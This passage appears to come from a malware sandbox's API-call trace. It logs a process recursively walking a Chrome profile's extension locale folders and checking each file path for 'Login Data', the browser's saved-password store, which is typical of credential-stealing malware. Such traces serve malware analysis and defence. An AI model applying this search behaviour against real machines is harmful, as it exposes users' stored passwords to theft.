Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt" [0161.573] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\" [0161.573] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\") returned 138 [0161.573] lstrlenW (lpString="messages.json") returned 13 [0161.573] GetProcessHeap () returned 0x8e0000 [0161.573] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.573] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\" [0161.573] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" [0161.573] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.573] GetProcessHeap () returned 0x8e0000 [0161.573] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.573] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json", lpSrch="Login Data") returned 0x0 [0161.574] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.574] GetProcessHeap () returned 0x8e0000 [0161.574] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.574] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a6a560, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.574] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.574] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.574] GetProcessHeap () returned 0x8e0000 [0161.574] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.574] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.574] GetProcessHeap () returned 0x8e0000 [0161.574] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.574] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a68df0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a68df0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="lv", cAlternateFileName="")) returned 1 [0161.574] lstrcmpiW (lpString1="lv", lpString2=".") returned 1 [0161.574] lstrcmpiW (lpString1="lv", lpString2="..") returned 1 [0161.574] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.574] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.574] lstrlenW (lpString="\\") returned 1 [0161.574] GetProcessHeap () returned 0x8e0000 [0161.574] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.574] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.574] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.574] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.574] lstrlenW (lpString="lv") returned 2 [0161.574] GetProcessHeap () returned 0x8e0000 [0161.574] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.574] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.574] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv" [0161.574] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.574] GetProcessHeap () returned 0x8e0000 [0161.574] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.574] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv") returned 137 [0161.574] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv") returned 137 [0161.574] lstrlenW (lpString="\\*.*") returned 4 [0161.574] GetProcessHeap () returned 0x8e0000 [0161.575] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.575] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv" [0161.575] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\*.*" [0161.575] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a68df0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a68df0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.575] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.575] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a68df0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a68df0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.575] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.575] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.575] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a6a560, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.575] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv") returned 137 [0161.575] lstrlenW (lpString="\\") returned 1 [0161.576] GetProcessHeap () returned 0x8e0000 [0161.576] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.576] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv" [0161.576] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\" [0161.576] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\") returned 138 [0161.576] lstrlenW (lpString="messages.json") returned 13 [0161.576] GetProcessHeap () returned 0x8e0000 [0161.576] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.576] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\" [0161.576] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" [0161.576] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.576] GetProcessHeap () returned 0x8e0000 [0161.576] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.576] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json", lpSrch="Login Data") returned 0x0 [0161.576] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.576] GetProcessHeap () returned 0x8e0000 [0161.576] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.576] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a6a560, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.576] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.576] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.576] GetProcessHeap () returned 0x8e0000 [0161.576] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.576] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.576] GetProcessHeap () returned 0x8e0000 [0161.576] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.576] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="ms", cAlternateFileName="")) returned 1 [0161.576] lstrcmpiW (lpString1="ms", lpString2=".") returned 1 [0161.576] lstrcmpiW (lpString1="ms", lpString2="..") returned 1 [0161.576] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.576] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.576] lstrlenW (lpString="\\") returned 1 [0161.576] GetProcessHeap () returned 0x8e0000 [0161.577] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.577] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.577] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.577] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.577] lstrlenW (lpString="ms") returned 2 [0161.577] GetProcessHeap () returned 0x8e0000 [0161.577] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.577] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.577] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms" [0161.577] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.577] GetProcessHeap () returned 0x8e0000 [0161.577] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.577] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms") returned 137 [0161.577] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms") returned 137 [0161.577] lstrlenW (lpString="\\*.*") returned 4 [0161.577] GetProcessHeap () returned 0x8e0000 [0161.577] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.577] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms" [0161.577] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\*.*" [0161.577] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, 